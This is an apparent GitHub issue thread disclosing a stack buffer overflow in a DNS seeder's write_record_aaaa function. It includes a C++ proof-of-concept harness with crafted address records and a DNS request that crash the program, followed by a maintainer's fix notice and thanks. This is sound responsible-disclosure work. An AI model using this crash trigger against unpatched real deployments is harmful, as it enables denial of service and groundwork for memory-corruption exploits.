Stack corruption

[guidovranken]

If a sufficient amount of AAAA records is associated with a DNS request, a buffer overflow will occur in write_record_aaaa; up to 11 bytes beyond the end of the output buffer can be overwritten.

Append this to dns.cpp:

const uint8_t addresses[19][20] = {
{ 0x06, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x0B, 0x04, 0x00, 0x00, 0x00, 0x04,  },
{ 0x04, 0x00, 0x00, 0x00, 0x48, 0x00, 0x00, 0x24, 0x03, 0x00, 0x48, 0x00, 0x00, 0x1E, 0x03, 0x00, 0x00, 0x00, 0x31, 0xFF,  },
{ 0x04, 0x00, 0x00, 0x00, 0x13, 0x00, 0x00, 0x00, 0x00, 0xF6, 0xB7, 0xFF, 0xFF, 0xE1, 0xFF, 0xFF, 0xFC, 0x00, 0x00, 0xFF,  },
{ 0x06, 0x00, 0x00, 0x00, 0x13, 0x00, 0x00, 0x00, 0x00, 0x00, 0x20, 0x01, 0x00, 0x00, 0xFA, 0xFF, 0x00, 0x00, 0xFF, 0xFF,  },
{ 0x04, 0x00, 0x00, 0x00, 0x13, 0x00, 0x00, 0x00, 0x00, 0xF6, 0xB7, 0xFF, 0xFF, 0xE1, 0xFF, 0xFF, 0xFC, 0x00, 0x00, 0xFF,  },
{ 0x06, 0x00, 0x00, 0x00, 0x13, 0x00, 0x00, 0x00, 0x00, 0x00, 0x20, 0x01, 0x00, 0x00, 0xFA, 0xFF, 0x00, 0x00, 0xFF, 0xFF,  },
{ 0x04, 0x00, 0x00, 0x00, 0x03, 0xFF, 0x00, 0x00, 0x00, 0x02, 0x3A, 0xFF, 0xFF, 0x24, 0x03, 0x00, 0x00, 0x00, 0x00, 0xFF,  },
{ 0x06, 0x00, 0x00, 0x00, 0x13, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x0B, 0x04, 0x00, 0xFF, 0x08, 0x00,  },
{ 0x06, 0x00, 0x00, 0x00, 0x03, 0xFF, 0x00, 0x00, 0x30, 0x22, 0x3A, 0xFF, 0xFF, 0x24, 0x03, 0x00, 0x00, 0x00, 0x00, 0xFF,  },
{ 0x06, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x80, 0x0B, 0x04, 0x00, 0x00, 0x00, 0x00,  },
{ 0x06, 0x00, 0x00, 0x00, 0x48, 0x00, 0x00, 0x24, 0x03, 0x00, 0x48, 0x00, 0x00, 0x24, 0x03, 0x00, 0x00, 0x00, 0x00, 0xFF,  },
{ 0x06, 0x00, 0x00, 0x00, 0x13, 0x00, 0x00, 0x00, 0x00, 0x00, 0x20, 0x01, 0x00, 0x00, 0xFA, 0xFF, 0x00, 0x00, 0xFF, 0xFF,  },
{ 0x06, 0x00, 0x00, 0x00, 0x03, 0xFF, 0x00, 0x00, 0x00, 0x02, 0x3A, 0xFF, 0xFF, 0x24, 0x03, 0x00, 0x00, 0x00, 0x00, 0xFF,  },
{ 0x04, 0x00, 0x00, 0x00, 0x13, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x0B, 0x04, 0x00, 0xFF, 0x08, 0x00,  },
{ 0x06, 0x00, 0x00, 0x00, 0x03, 0xFF, 0x00, 0x00, 0x30, 0x22, 0x3A, 0xFF, 0xFF, 0x24, 0x03, 0x00, 0x00, 0x00, 0x00, 0xFF,  },
{ 0x06, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x80, 0x0B, 0x04, 0x00, 0x00, 0x00, 0x00,  },
{ 0x04, 0x00, 0x00, 0x00, 0x48, 0x00, 0x00, 0x24, 0x03, 0x00, 0x48, 0x00, 0x00, 0x24, 0x03, 0x00, 0x00, 0x00, 0x00, 0xFF,  },
{ 0x06, 0x00, 0x00, 0x00, 0x13, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x0B, 0x04, 0x00, 0x00, 0x00, 0x00,  },
{ 0x06, 0x00, 0x00, 0x00, 0x00, 0x00, 0xCF, 0x9A, 0x9A, 0x9A, 0x9A, 0x9A, 0x9A, 0x9A, 0x9A, 0x9A, 0x9A, 0x9A, 0x9A, 0x9A,  } };

int cb(void *opt, char *requested_hostname, addr_t *addr, int max, int ipv4, int ipv6) {
    uint32_t num = 0;
    while ( num < max && num < 19 ) {
        memcpy(&addr[num], addresses[num], 20);
        num++;
    }
    return num;
}

int main(void)
{
    const uint8_t in[] = {0x1B, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x23, 0x00,
                          0x7A, 0x08, 0x00, 0x00, 0xFF, 0x00, 0xFF};
    uint8_t out[BUFLEN];
    dns_opt_t opt;
    opt.port = 0;
    opt.datattl = 0;
    opt.nsttl = 0;
    opt.host = "";
    opt.ns = "";
    opt.mbox = "";
    opt.cb = cb;
    opt.nRequests = 0;
    dnshandle(&opt, in, sizeof(in), out);
    return 0;
}

$ g++ dns.cpp && ./a.out
*** stack smashing detected ***: <unknown> terminated
Aborted (core dumped)

[sipa]

Thanks for reporting! Should be fixed in b1cf356.

[practicalswift]

Nice catch @guidovranken!

Very excited about your work: thanks for helping hardening various parts of the Bitcoin ecosystem by trying to break it! :)

I saw the Trezor firmware bug you found in trezor/trezor-firmware#1374 the other day too. Solid work!